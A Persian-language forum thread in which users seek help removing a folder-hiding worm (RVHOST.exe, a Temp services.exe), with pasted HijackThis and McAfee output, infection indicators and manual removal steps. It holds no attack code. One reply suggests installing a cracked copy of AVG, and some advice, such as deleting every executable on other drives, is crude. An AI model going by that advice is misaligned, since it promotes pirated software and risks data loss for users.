فولدرهای My Documents را هم هدن شده نشون میده .

اساتید لطفا بگید:

این ویروس چیه

فایلهایی رو که پاک کرده کجاست و چه طوری میاد

با چی میتونم از شر اون خلاص شم

تا حالا کسی با این ویروس برخورد کرده

چه نرم افزارهایی احتیاج دارم

ممنون و متشکر از بزرگوارانی که به فکر من هستند

ابتداآنتی ویروس مک آفی هم امتحان کن . اگه جواب نداد :

من پیشنهاد می کنم این کارو بکنی !
جهت نابودی ویروس ابتدا سیستم ری استور رو غیر فعال کن رو My Computer راست کلیک کن تب System Restor اونو غیر فعال کن بعد هر چی فایل اجرایی تو درایو هایی به جز درایو ویندوز داری پاک کن ! (یه دونشم نباید جا بمونه !) بعد درایو ویندوز رو فورمت کن و یه ویندوز ترو تمیز دیگه نصب کن !! احتمالا مشکلت حل می شه !

موفق و پیروز باشید

جاوید

وای این خیلی سخته

کار زیاد سختی نیست برای پیدا کردن فایل های اجرایی تو سرچ کافیه اینو سرچ کنی exe.* !

جاوید جان بعدا باید این فایلها رو چه طوری سر جای خودشون بذارم

در ضمن مک افی هم سیستمم رو قفل کرد

سیستم من خیلی بالاست

هارد هم 500 گیگ است

:41:

جاوید جان سرچ کردم ولی فولدری را که فایل های ورد یا فایلهای mp3 یا تصویری داره رو هم میاره
مثلا من تو یک فولدر فایلهای pdf و word رو گذاشتم و سرچ اینو آورده :
g:\darsi اینارو باید حذف کنم یا نه

p-derakhshani

جان به قول جاوید جان

یه آنتی ویروس مک آفی یا کسپر اسکی یا نوترون و...

نصب کن خیال خودت رو راحت کن

سلام
دوست عزیز
چطوره یه ویندوز مطمعن که از ویروسی نبودن اون مطمعنی پیدا کنی و یه ویندوز دیگه نصب کنی (ضمن اینکه درایوی که ویندوز توی اون بوده و ویندوز جدید رو روی اون نصب می کنی رو فرمت کنی البته بهترین حالت اینه که ویندوز رو روی درایو C نصب کنی)
بعدش هم بدون اینکه وارد درایو های دیگه بشی یا برنامه ی اضافی اجرا کنی یه Nod 32 نصب کنی و از اینترنت آپدیتش کنی و بعدش هم خودش کار اون ویروس رو یکسره می کنه

* ممکنه مجبور بشی صدا یا درایور گرافیک رو نصب کنی ولی به هیچ عنوان وارد درایو ها نشو اگه هم لازم شد فقط به درایو C که ویندوز روی اون نصب شده سر بزن مطمعن باش با وارد شدن به درایو های دیگه خودت استارت استفاده از ویروس رو زدی که بازم کارت مشکل می شه

دوستان بزرگان اساتید ....
سریعتر

p-derakhshani

جان به قول جاوید جان

یه آنتی ویروس مک آفی یا کسپر اسکی یا نوترون و...

نصب کن خیال خودت رو راحت کن

به خدا به خدا به خدا نشد
اینارو بلدم

سلام
دوست عزیز
چطوره یه ویندوز مطمعن که از ویروسی نبودن اون مطمعنی پیدا کنی و یه ویندوز دیگه نصب کنی (ضمن اینکه درایوی که ویندوز توی اون بوده و ویندوز جدید رو روی اون نصب می کنی رو فرمت کنی البته بهترین حالت اینه که ویندوز رو روی درایو C نصب کنی)
بعدش هم بدون اینکه وارد درایو های دیگه بشی یا برنامه ی اضافی اجرا کنی یه Nod 32 نصب کنی و از اینترنت آپدیتش کنی و بعدش هم خودش کار اون ویروس رو یکسره می کنه

* ممکنه مجبور بشی صدا یا درایور گرافیک رو نصب کنی ولی به هیچ عنوان وارد درایو ها نشو اگه هم لازم شد فقط به درایو C که ویندوز روی اون نصب شده سر بزن مطمعن باش با وارد شدن به درایو های دیگه خودت استارت استفاده از ویروس رو زدی که بازم کارت مشکل می شه

به پیشنهاد دوستان بود

راست میگی نباید وارد درایوهای دیگه بشم

تو رو خدا بازم بگید دیگه چی کار کنم

nod32 را از سی دی مجله رایان خبر دارم

ای مومنین ، مورد ما اورژانسیه

اصلا پیدا کردید اسمش چیه

می خوای اینجا یه پست بده :
تاپیک اختصاصی مشکلات اضطراری آلوده شدن سیستم به ویروس ها و اسپای ور ها
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

به پیشنهاد دوستان بود

راست میگی نباید وارد درایوهای دیگه بشم

مطمعن باش که نباید وارد درایو های دیگه بشی چون ممکنه باعث اجرا شدن ویروس بشی و بعدش هم روز از نو روزی از نو

زیاد هم نگران نباش اصلا این کارها سخت نیست حتی خیلی هم آسونه :46:

نود 32 هم یه تنظیماتی داره که میتونی از اینجا ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) بگیری (البته با راست کلیک رو ی اینجا و انتخاب save target az(

آپدیت اون هم که کاری نداره می ری روی گزینه ی آپدیت و update now رو میزنی

سلام دوست من
فکر کنم تنها ویروس کشی که هیچ گونه ویروسی از دستش در نمی ره و می تونی باهاش ویروست رو از بین ببری ویروس کش avg7.5 هست با کرکش که نصب کنی خودش هم آپدیت می شه و مشکل تو رو حل خواهد کرد.

نه قربونت برم وقتی کسپر نتونسته کاری کنه AVG هم نمیتونه.
شما باید یه report از ویروس به شرکت مربوطه میدادید تا اونا مشخصاتش رو براتون بفرستن.
این ویروس احتمالا به عنوان یه Service با ویندوز load میشه.
باید تحت داس یا از طریق حالت safemode بگردید دنبالش.
-------------------
ولی معمولا بعد از فرمت کردن درایو مربوطه و نصب مجدد ویندوز باید از بین رفته باشه.

باور کنید از طریق safe mode و dos وارد شدم ولی نشد که نشد
یه بار هم ویندوز عوض کردم و فوری nod32 اپدیت شده نصب کردم که با اسکن کردن هم نشد.
بعد از ان باز وقتی وارد درایوی میشی باز هم nod32 میگه این ویروس به این فولدر یا این درایو یا این فایل حمله کرده

ای بر پدر هر چی ویروسه لعنت

سلام
این ویروس منو داغ دار کرده
برای یاری دست همه تونو می بوسم
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعضی میگن باید کل هارد رو فرمت کنی

این جوری دیوونه میشم

nod32 در قسمت threat می نویسه
probably unknown newHeur_PE virus

و در قسمت فایل می نویسه:
c:\docume~1\peyman~1\locals~1\temp\services.exe

گفتم شاید یک راهنمایی باشه

سلام دوست عزیز

با این میزان آلودگی در سیستم بهترین راه حل فرمت تمام هارد و پارتیشن بندی مجدد و نصب یک ویندوز جدید است باور

کن به دردسرش نمی ارزد پاک کردن چنین کدهای مخربی که به احتمال زیاد از یک روت کیت برای پنهان کردن خودش

استفاده می کند کار ساده ای نیست ولی اگر حوصله اش را داشتی می توانی به عنوان اولین قدم از دستورات مندرج در

تاپیک زیر استفاده کنی و نتیجه را گزارش کنی :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

من یک ویروس جدید گرفتم به نام new heur_pe کار این ویروس مخفی کردن شاخه ها است واز آنها یک فایل exe می سازه و بعد آن را پاک می کنه و شما دیگ نمی توانید آن شاخه را دوباره بسازید چون شاخه هیدن شده اما حتی نمی توان آن را دید من در تنظیمات هم نتوانستم کاری بکنم کمک کمک کمک کمک کمک کمک

راستی هیچ آنتی ویروس به غیر از nod قادر به شناسایی آن نیست ولی نمی تواند آن را پاک کند ؟

کمممممممممممممممممممممممم ممممممممممممممممممممممممم ممممممممممممممممک

nod32 در قسمت threat می نویسه
probably unknown newHeur_PE virus

و در قسمت فایل می نویسه:
c:\docume~1\peyman~1\locals~1\temp\services.exe

گفتم شاید یک راهنمایی باشه

آقا ویروس New Folder.exe افتاده تو کامپیوترم :18:
زده تمام عکس هام رو که بیشتر از 1 گیگابایت بودن پاک کرده
حالا من چه جوری این عکس ها رو بر گردونم
ممنون میشم اگه کمک کنید .
ویروس رو پاک کردم . :41:

آقا اگه بشه یه نرم افزار رکوری که 100% بتونه اطلاعات رو سالم برگردونه معرفی کنید
برنامه ایی هست که بتونه سیستم رو به یک ساعت پیش از پاک شدن فایل ها بر گردونه ؟

اگه میشه از این قویترش رو معرفی کنید
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

فرمت عکس ها Jpg بود.
برای مقابله با ویروس هایی که فایل ها رو پاک کی کنن ( یه فایل ویژه ) چی کار باید کرد؟؟
این ویروس نیوقولدر رو چه جوری از بین ببریم ؟؟

اينجا رو ببين!!![ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

چه جالب ، تو این مملکت و تو این سایت چند نفر نیستند در مورد این ویروس newHeur_PE virus

چیزهایی بدونند

دوست من
اینو خونده بودم
من میخواستم بدونم اگه آنتی ویروس نباشه
چه جوری از پاک شدن فایل ها جلوگیری بکنیم؟

چه جالب ، تو این مملکت و تو این سایت چند نفر نیستند در مورد این ویروس newHeur_PE virus

چیزهایی بدونند

دوست من

فکر کنم من قبلا راهنماییتان کردم ولی ظاهرا شما ... دوست عزیز newHeur_PE virus نام یک ویروس خاص نیست این

نامی است که نود32 به فایلهای مشکوکی که توسط هوش مصنوعی خود شناسایی می کند اطلاق می کند یعنی اینکه

این فایلی را که با این نام معرفی کرده است هر چیزی می تواند باشد حتی یک فایل بی ضرر ( ولی با توجه به قدرت

هوریستیک نود32 بعید است ) .همانطور که قبلا هم گفتم این ویروس یا یک نمونه جدید است یا توسط روت کیت خود را

پنهان کرده است و با میزان اطلاعاتی که شما فراهم می کنید ( و حوصله ای که شما دارید ) راهنمایی کردن شما بسیار

مشکل است .

vtn جان ممنون و می دانم تو تاپیک خودم راهنماییم کردی
ولی کامپیو زهرمار ما ،اطلاعات یک شرکتو داره و تا پانزدهم وقت دارم وگرنه آبرو . . .
شما فرمودید فرمت کن ولی من نمیتونم چون کارمو . . .
گفتم دوستانی که با سایتهای معتبر خارجی د ر ارتباط هستند شاید اگه چند جا بپرسم ، یه بار اینو بخونند
و کمکم کنند

سلام منم با همین ویروس بدبخت شده ام
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگه مشکل شما حل شده لطفا ما رو هم راهنمایی کن

این آقا مهدی هم مشکل ما رو داره
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

لطفا یه لینک واسه داونلود Avg بدید

vtn جان ممنون و می دانم تو تاپیک خودم راهنماییم کردی
ولی کامپیو زهرمار ما ،اطلاعات یک شرکتو داره و تا پانزدهم وقت دارم وگرنه آبرو . . .
شما فرمودید فرمت کن ولی من نمیتونم چون کارمو . . .
گفتم دوستانی که با سایتهای معتبر خارجی د ر ارتباط هستند شاید اگه چند جا بپرسم ، یه بار اینو بخونند
و کمکم کنند

در این وضعیتی که شما دارید چند کار می شود کرد ( البته احتمالا نیاز باشد که در آخر همه آنها را انجام بدهی ! )

1.راحتترین راه همان راهی است که در آن تاپیک به شما گفتم سیستمت را با سرویس نانو اسکن پاندا اسکن کن ببین

چیزی گزارش می کند یا نه ؟

2.دنبال AVG ویا آنتی ویروسهای دیگر نباش در شرایط فعلی تنها دو آنتی ویروس می توانند کمکت کنند : آنتی ویر و

کاسپرسکی .آنتی ویر را از لینک زیر داونلود کن و قدرت هوریستیک و عمق اسکن آن را روی حداکثر بگذار و پس از آپدیت

سیستمت را با آن اسکن کن ( اسکن کل هارد در حالت Safe Mode بهتر است ):

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

3.اگر آنتی ویر چیزی پیدا نکرد آخرین نسخه ( نسخه 621 )کاسپرسکی را داونلود کن آپدیت کن و سرویس

PDM را به طور کامل فعال کن در ضمن پس از آپدیت آن و فعال کردن تمامی گزینه های مربوط به شناسایی انواع کد های

مخرب قدرت اسکن را روی حداکثر بگذار و دوباره در حالت Safe Mode کل سیستم را اسکن کن .اخطارهای سرویس PDM

را سرسری رد نکن ( چون احتمال اینکه آن چیزی پیدا کند از اسکن بیشتر است ) اگر اخطار مشکوکی دیدی می توانی

اینجا بگی تا کمکت کنیم .

4.اگر تا اینجا مشکلت حل نشد بگو تا روشهای دیکر را بگویم که تخصصی تر هستند .البته یادت باشد منظور از همه

اینکارها شناسایی ویروس است نه پاک کردن آن .هر کدام از روشهای بالا اگر چیزی گزارش کردند حتی اگر به نظرت

بی اهمیت باشد می تواند مفید باشد .

در ضمن اگر توانستی آن فایل Service.exe را که نود32 در پوشه Temp شناسایی کرده است را یکجا آپلود کن شاید

کمکی باشد.

منتقل شد.......

کمک همه شاخه ها مخفی شده با newHeur_PE چه کنم

کمک همه شاخه ها مخفی شده با newHeur_PE چه کنم با این ویروس خفن پاک نمیشه

p-derakhshani جان حتما یه جوری همون Service.exe که vtn گفت آپلود کن تا ما با آنتی ویروسهای مختلف تستش کنیم. نگران من هم نباش.میدونم از دست دادن اطلاعات مهم چقدر ناراحت کننده ست.خودم 2 بار تجربه کردم.
من از قبل برای هرگونه حمله احتمالی آماده شدم.

سلام به همه دوستان صمیمی!!!
کامپیوتر من با یک نوع ویروس ویا تروجانی آلوده شده است که این تروجان در بین فولدر ها نفوذ نموده و در بین آن فولدر ها یک فایل exe میسازد که ظاهراً شکل یک فولدر را دارد و اسم این فولدر ساخته شده عین اسم فولدری است که این فولدر ساخته شده در بین آن نفوذ نموده است. زمانی که یاهو مسنجرم را باز میکنم،عملیات های خود سرانه ای را انجام میدهد و خود را به کامپیوتر دوستانم میفرستد. با آنتی ویروس AVG 7.5 کامپیوترم را اسکن نمودم اما نمیتواند شناسایی کند.لطفاً به من یک آنتی ویروس قوی ای را معرفی نمایید تا از شر این شی نامعلوم نجات بیابم. اگر لینکش را برایم بگزارید، ممنون میشوم.
ممنون شما
فرهمند

سلام به همه دوستان صمیمی!!!
کامپیوتر من با یک نوع ویروس ویا تروجانی آلوده شده است که این تروجان در بین فولدر ها نفوذ نموده و در بین آن فولدر ها یک فایل exe میسازد که ظاهراً شکل یک فولدر را دارد و اسم این فولدر ساخته شده عین اسم فولدری است که این فولدر ساخته شده در بین آن نفوذ نموده است. زمانی که یاهو مسنجرم را باز میکنم،عملیات های خود سرانه ای را انجام میدهد و خود را به کامپیوتر دوستانم میفرستد. با آنتی ویروس AVG 7.5 کامپیوترم را اسکن نمودم اما نمیتواند شناسایی کند.لطفاً به من یک آنتی ویروس قوی ای را معرفی نمایید تا از شر این شی نامعلوم نجات بیابم. اگر لینکش را برایم بگزارید، ممنون میشوم.
ممنون شما
فرهمند

سلام دوست عزیز

فایل زیر راداونلود کن و آن را اجرا کن.( البته اگر ویروس مزبور اجازه اجرای آن را بدهد ) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام
این ویروس رو چه طوری به طور صد در صد از بین ببرم ؟

سلام من نمی دونم ویروس نیو فولدر اگزه را با هر انتی ویروسی امتحان میکنم از بین نمی ره
یکی به من کمک کنه که حسابی اعصابم را خورد کرده. و تمام کامپیوترهام از کار افتادن
مرسی تشکر

عضويت تبريك
جستجو.... شرط اول
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

سلام دوست عزیز

فایل زیر راداونلود کن و آن را اجرا کن.( البته اگر ویروس مزبور اجازه اجرای آن را بدهد ) در صفحه اول گزینه

Do a system scan and save a logfile را انتخاب کن و گزارش اسکن را به طور کامل اینجا Copy&Past کن:

سلام دوست من!!
ممنون از رهنمایی خوبت!
من برنامه ویا فایلی که لینکش را برایم گزاشته بودی، دانلود نمودم و اینهم گزارشش:


Logfile of HijackThis v1.99.1
Scan saved at 0318 ب.ظ, on 2007/04/02
Platform: Windows XP SP2 (WinNT 5.01.2600)
MSIE: Internet Explorer v6.00 SP2 (6.00.2900.2180)
Running processes:
C:\WINDOWS\System32\smss.exe
C:\WINDOWS\system32\winlogon.exe
C:\WINDOWS\system32\services.exe
C:\WINDOWS\system32\lsass.exe
C:\WINDOWS\system32\svchost.exe
C:\WINDOWS\System32\svchost.exe
C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
C:\WINDOWS\Explorer.exe
C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
C:\WINDOWS\system32\spoolsv.exe
C:\Program Files\Symantec AntiVirus\DefWatch.exe
C:\WINDOWS\system32\svchost.exe
C:\Program Files\Symantec AntiVirus\Rtvscan.exe
C:\WINDOWS\system32\wscntfy.exe
C:\WINDOWS\system32\RVHOST.exe
C:\WINDOWS\system32\hkcmd.exe
C:\WINDOWS\system32\igfxpers.exe
C:\WINDOWS\stsystra.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\WINDOWS\system32\igfxsrvc.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\PROGRA~1\SYMANT~1\VPTray.exe
C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe
C:\WINDOWS\system32\ctfmon.exe
C:\Program Files\Messenger\msmsgs.exe
C:\WINDOWS\system32\RVHOST.exe
C:\WINDOWS\BricoPacks\Vista Inspirat\ObjectDock\ObjectDock.exe
C:\WINDOWS\BricoPacks\Vista Inspirat\YzToolbar\YzToolBar.exe
C:\Program Files\Yahoo!\Messenger\YPager.exe
C:\Program Files\Corel\Corel Photo Album 6\MediaDetect.exe
C:\WINDOWS\system32\wuauclt.exe
E:\New AVG\HijackThis.exe
F2 - REG:system.ini: Shell=Explorer.exe RVHOST.exe
O3 - Toolbar: Yahoo! Toolbar - {EF99BD32-C1FB-11D2-892F-0090271D4F88} - C:\Program Files\Yahoo!\Companion\Installs\cpn\yt.dll
O4 - HKLM\..\Run: [igfxtray] C:\WINDOWS\system32\igfxtray.exe
O4 - HKLM\..\Run: [igfxhkcmd] C:\WINDOWS\system32\hkcmd.exe
O4 - HKLM\..\Run: [igfxpers] C:\WINDOWS\system32\igfxpers.exe
O4 - HKLM\..\Run: [SigmatelSysTrayApp] stsystra.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [ISUSPM Startup] "C:\Program Files\Common Files\InstallShield\UpdateService\ISUSPM.exe" -startup
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [Corel Photo Downloader] C:\Program Files\Corel\Corel Photo Album 6\MediaDetect.exe
O4 - HKCU\..\Run: [CTFMON.EXE] C:\WINDOWS\system32\ctfmon.exe
O4 - HKCU\..\Run: [Yahoo! Pager] "C:\Program Files\Yahoo!\Messenger\ypager.exe" -quiet
O4 - HKCU\..\Run: [MSMSGS] "C:\Program Files\Messenger\msmsgs.exe" /background
O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\RVHOST.exe
O4 - Startup: Stardock ObjectDock.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat\ObjectDock\ObjectDock.exe
O4 - Startup: Y'z ToolBar.lnk = C:\WINDOWS\BricoPacks\Vista Inspirat\YzToolbar\YzToolBar.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System, DisableRegedit=1
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~2\OFFICE11\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_03\bin\npjpi142_03.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\j2re1.4.2_03\bin\npjpi142_03.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~2\OFFICE11\REFIEBAR.DLL
O9 - Extra button: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\Yahoo!\MESSEN~1\YPager.exe
O9 - Extra 'Tools' menuitem: Yahoo! Messenger - {E5D12C4E-7B4F-11D3-B5C9-0050045C3C96} - C:\PROGRA~1\Yahoo!\MESSEN~1\YPager.exe
O9 - Extra button: Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O9 - Extra 'Tools' menuitem: Windows Messenger - {FB5F1910-F110-11d2-BB9E-00C04F795683} - C:\Program Files\Messenger\msmsgs.exe
O17 - HKLM\System\CCS\Services\Tcpip\..\{3C3F10AE-B653-4335-9655-728165231CF0}: NameServer = 66.178.2.16,58.147.128.7
O17 - HKLM\System\CS1\Services\Tcpip\..\{3C3F10AE-B653-4335-9655-728165231CF0}: NameServer = 66.178.2.16,58.147.128.7
O17 - HKLM\System\CS2\Services\Tcpip\..\{3C3F10AE-B653-4335-9655-728165231CF0}: NameServer = 66.178.2.16,58.147.128.7
O20 - Winlogon Notify: igfxcui - C:\WINDOWS\SYSTEM32\igfxdev.dll
O20 - Winlogon Notify: NavLogon - C:\WINDOWS\system32\NavLogon.dll
O21 - SSODL: WPDShServiceObj - {AAA288BA-9A4C-45B0-95D7-94D524869DB5} - C:\WINDOWS\system32\WPDShServiceObj.dll
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccEvtMgr.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSetMgr.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: Symantec Network Drivers Service (SNDSrvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SNDSrvc.exe
O23 - Service: Symantec SPBBCSvc (SPBBCSvc) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCSvc.exe
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe

سلام دوست عزیز!!
منتظر رهنمایی هر چه عاجلت هستم.
خیلی مزاحمم شده.لطفاً شرشو از سرم کم کن.
بااحترام
فرهمند

سلام دوست عزیز!!
منتظر رهنمایی هر چه عاجلت هستم.
خیلی مزاحمم شده.لطفاً شرشو از سرم کم کن.
بااحترام
فرهمند

سلام دوست عزیز

سیستم شما مورد حمله یک کرم قرار گرفته است که نامهای مختلفی دارد :


* Trojan.Agent.ahe (Rising)

* W32/SillyFDC-G (Sophos)

* W32/SillyFDC.G (Fortinet)

* W32/Sohanat.BD.worm (Panda)

* Win32.HLLW.Cung (Doctor web)

* Win32/Nuqel.A (Ca vet)

* Win32:Hakaglan [Wrm] (Alwil)

* Worm.Hakaglan.B (Virusbuster)

* Worm.Win32.AutoIt.e (Kaspersky)

* Worm/Hakaglan.A.2 (H+BEDV)

خوب دوست عزیز اولین و بهترین کار این است که از خود نورتون که روی سیستمت نصب است کمک بگیری برای

اینکار به ترتیب کارهایی را که می گویم انجام بده :

1.سرویس System Restore ویندوز را غیر فعال کن و نورتون را کاملا آپدیت کن و سیستمت را ریستارت کن.

2.برنامه کم حجم Unlocker1.8.5 ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) را داونلود و

نصب کن .پس از نصب آن ریستارت کن و به Safe Mode برو و سپس به پوشه سیستم 32 وافع در پوشه ویندوز ( روی

درایو C ) برو و فایل RVHOST.exe را پیدا کن ( البته قبلا باید در Folder Option فایلها را از حالت Hidden در آورده

باشی ) بعد روی آن کلیک کن و از منوی باز شده گزینه Unlocker را انتخاب کن در پنجره ای که باز می شود گزینه Delete

را انتخاب کن و OK را بزن :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

اگر برنامه توانست فایل مزبور را پاک کندکه چه بهتر ولی اگر نتوانست پنجره زیر پدیدار می شود که فقط Yes را بزن و

ریستارت کن :

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

3.حالا سیستمت را با نورتون به طور کامل اسکن کن اگر نورتون چیزی پیدا نکرد کاسپرسکی و یا دکتر وب و یا پاندا را

نصب و آپدیت کن و سیستمت را با آنها اسکن کن و هر آلودگی را که پیدا کردند به طور کامل پاک کن .

4.اگر توانستی مراحل فوق را با موفقیت طی کنی باید کلیدهای رجیستری را هم به طور دستی پاک کنی ک

پنجره Registry Editor را باز کن و کلیدهای زیر را پیدا کن :


HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Curr entVersion\Run
HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Explorer\Shell Folders

و در هر کدام از آنها گزینه های مربوط به ویروس یا همان RVHOST.exe ( که خودش را با نام یاهو مسنجر هم معرفی

می کند ) پیدا و Delete کن ( البته فقط گزینه مربوط به ویروس را نه بقیه گزینه ها را ) برای احتیاط بیشتر بهتر است

قبل از دستکاری رجیستری از آن بک آپ بگیری.

حالا دوباره برنامه HijackThis را اجرا کن ببین نشانه های آلودگی با ویروس که موارد زیر هستند پاک شده اند یا نه :


C:\WINDOWS\system32\RVHOST.exe
F2 - REG:system.ini: Shell=Explorer.exe RVHOST.exe
O4 - HKCU\..\Run: [Yahoo Messengger] C:\WINDOWS\system32\RVHOST.exe
O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Pol icies\System, DisableRegedit=1

اگر در انجام هر کدام از مراحل بالا مشکل داشتی بگو تا کمکت کنیم.

p-derakhshani جان حتما یه جوری همون Service.exe که vtn گفت آپلود کن تا ما با آنتی ویروسهای مختلف تستش کنیم. نگران من هم نباش.میدونم از دست دادن اطلاعات مهم چقدر ناراحت کننده ست.خودم 2 بار تجربه کردم.
من از قبل برای هرگونه حمله احتمالی آماده شدم.

سلام و خیلی ممنون
services folder ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
این هم فولدر services که از document\localsitting\temp\services اوردم و به صورت exe در امده
وقتی تو کافی نت داشتم اپلود می کردم nod در قسمت threat نوشته بود win32/delf.yh trojan
و گزینه dell هم داشت ولی nod اپدیت شده من اینگونه نبود و اصلا تشخیص ان همانی بود که قبلا گفتم و
اصلا گزینه dell نداشت.
قابل توجه دوستانی که فولدر های بزرگ آنها مخفی شده ، من با

McAfee Virus-Scan Plus 2007

اونا رو آوردم و دیگه مخفی نشد ولی همچنان ویروسی بود و حجم آن را همان 37.5 نشان میداد
ممنون

سلام.
اینکه حجمی نداره. مطمئنی درست آپلود شده؟

سلام و خیلی ممنون
services folder ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ])
این هم فولدر services که از document\localsitting\temp\services اوردم و به صورت exe در امده
وقتی تو کافی نت داشتم اپلود می کردم nod در قسمت threat نوشته بود win32/delf.yh trojan
و گزینه dell هم داشت ولی nod اپدیت شده من اینگونه نبود و اصلا تشخیص ان همانی بود که قبلا گفتم و
اصلا گزینه dell نداشت.
قابل توجه دوستانی که فولدر های بزرگ آنها مخفی شده ، من با

McAfee Virus-Scan Plus 2007

اونا رو آوردم و دیگه مخفی نشد ولی همچنان ویروسی بود و حجم آن را همان 37.5 نشان میداد
ممنون
سلام دوست عزیز

فایل را درست آپلود نکرده ای حجم فایل آپلود شده صفر است .ویروسی که از آن نام برده ای با آنکه در پستهای قبلی به

آن اشاره کرده ای متفاوت است win32/delf.yh فایلهایی با پسوند jpg و zip را از روی هارد پاک می کند ( مخفی نمی

کند. ) مک آفی ویروس را با چه نامی می شناسد ؟

cancellation

McAfee has detected a potentially unauthorized change to your computer.

Details
SystemGuard Name: Winlogon Shell
Change: Registry Modified

More Info
SystemGuard Description: The Winlogon Shell is automatically loaded when a user logs on to Windows. The Shell is the main User Interface (UI) used to manage Windows and is usually Windows Explorer (explorer.exe). However, the Windows Shell can be easily changed to point to another program. If this occurs, a program other than the Windows Shell is launched every time a user logs on.

Process: F:\game save.exe
Affected Items: C:\WINDOWS\explorer.exe, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell

If you did not expect this change, McAfee recommends that you block it. If you expected this change, allow it.

این پیغامیه که وقتی وارد درایو f و فولدر game save شدم داد و دو گزینه allow change و block change
را داد .
در ضمن این تروجان فایلهای jpg و zip را پاک میکنه ولی فایلهای بزرگ زیپ رو پاک نمی کنه
همچنین فولدرهای بزرگ رو وقتی واردش میشی و میای بیرون ، اونا رو هم مخفی می کنه.
در ضمن مک آفی اونو نمیشناسه
اون فولدر services را هم نمیذاره کپی بگیرم و آپلود کنم
nod32 وقتی run میشه میگه این فایل services.exe را باید پاک کنی و بعد میگه باید سیستم reboot بشه
ولی بعد از رستارت باز همان آش و ...
من قبل از این ویروس :31: بودم ولی الان سه هفته است که :41: شدم

McAfee has detected a potentially unauthorized change to your computer.

Details
SystemGuard Name: Winlogon Shell
Change: Registry Modified

More Info
SystemGuard Description: The Winlogon Shell is automatically loaded when a user logs on to Windows. The Shell is the main User Interface (UI) used to manage Windows and is usually Windows Explorer (explorer.exe). However, the Windows Shell can be easily changed to point to another program. If this occurs, a program other than the Windows Shell is launched every time a user logs on.

Process: F:\game save.exe
Affected Items: C:\WINDOWS\explorer.exe, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\shell

If you did not expect this change, McAfee recommends that you block it. If you expected this change, allow it.

این پیغامیه که وقتی وارد درایو f و فولدر game save شدم داد و دو گزینه allow change و block change
را داد .
